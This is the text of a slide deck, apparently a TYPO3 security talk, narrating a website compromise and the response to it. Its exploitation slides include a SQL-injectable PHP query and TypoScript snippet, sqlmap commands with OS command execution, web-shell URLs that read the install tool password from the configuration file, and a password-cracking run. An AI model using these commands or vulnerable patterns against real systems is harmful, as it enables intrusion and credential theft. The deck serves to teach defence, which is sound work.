Diary of a Hack
28
https://www.google.de/?q=exec_SELECTquery+%22You
+have+an+error+in+your+SQL+syntax%22
Slide 29
Slide 29 text
Diary of a Hack
Day 5 - Exploitation
29
Slide 30
Slide 30 text
Inspiring people to
share
Diary of a Hack
Vulnerabilities and Attacks
Excursion - SQLi
30
Slide 31
Slide 31 text
Excursion - SQLi
31
SELECT *
FROM tt_content
WHERE colPos = 0
Slide 32
Slide 32 text
32
'SELECT *
FROM tt_content
WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
Slide 33
Slide 33 text
33
Excursion - SQLi
Slide 34
Slide 34 text
34
'SELECT *
FROM tt_content
WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
Slide 35
Slide 35 text
35
'SELECT *
FROM tt_content
WHERE colPos = 0 or hidden = 1'
$_GET['colPos']
Excursion - SQLi
Slide 36
Slide 36 text
Disclaimer
36
Slide 37
Slide 37 text
Don’t do this at home!
37
Slide 38
Slide 38 text
(unless you have written permit)
38
Slide 39
Slide 39 text
Diary of a Hack
39
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'
!
GET parameter 'colPos' is vulnerable. Do you want to keep testing the others?
[y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s)
requests:
Slide 40
Slide 40 text
Inspiring people to
share
Diary of a Hack
Vulnerabilities and Attacks
The power of MySQL
40
Slide 41
Slide 41 text
Diary of a Hack
41
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \
—os-cmd='ls -al'
Slide 42
Slide 42 text
Diary of a Hack
42
Slide 43
Slide 43 text
Diary of a Hack
43
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/
ENABLE_INSTALL_TOOL
!
http://security.dev/typo3/sysext/install/Start/Install.php
!
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword
%20typo3conf/LocalConfiguration.php
Slide 44
Slide 44 text
Diary of a Hack
44
$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password (dummy)
guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900
trying: 123456 - fishing
Slide 45
Slide 45 text
Diary of a Hack
45
Slide 46
Slide 46 text
Diary of a Hack
Day 5 - Discovery
46
Slide 47
Slide 47 text
Diary of a Hack
Discovery
• Take site offline!
• seriously
• I mean it
47
Slide 48
Slide 48 text
48
Slide 49
Slide 49 text
Diary of a Hack
Day 6 - Analysis
49
Slide 50
Slide 50 text
Diary of a Hack
Analysis
• Make a backup of current state (files, DB, logs)
• Search all logs for „suspicious“ entries
• Find point of entry (security issue)
• If in doubt: get help
50
Diary of a Hack
53
lib.sqliSearch = CONTENT
lib.sqliSearch {
table = tt_content
select.where = header like ###search###
select.markers {
search.data = GP:search
search.wrap = %|%
}
}
Slide 54
Slide 54 text
Diary of a Hack
Fix
• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup
installation
• Go online again
• Plan improvements (education, monitoring, …)
54
Slide 55
Slide 55 text
Diary of a Hack
Day 8 - Improve
55
Slide 56
Slide 56 text
Inspiring people to
share
Security of Web Applications
Vulnerabilities and Attacks
Topictext
Lessons learned
• Development/ Testing Environment
• Deploy to Production
• Least privilege
• There is no Software without bugs. Be prepared!
56
Slide 57
Slide 57 text
Diary of a Hack
Best Practice
• Operations
• Regular updates
• Backups
• Monitoring
• Development
• Peer Reviews (TypoScript, Code, Templates)
• (automated) Tests
• Focus
• Education
• Allocate time for all of the above
57
Slide 58
Slide 58 text
Questions?
58
Slide 59
Slide 59 text
Inspiring people to
share
Security of Web Applications
Vulnerabilities and Attacks
Diary of a Hack
Resources
• http://docs.typo3.org/typo3cms/SecurityGuide/
• http://sqlmap.org
• http://www.openwall.com/john/
• https://www.owasp.org/
59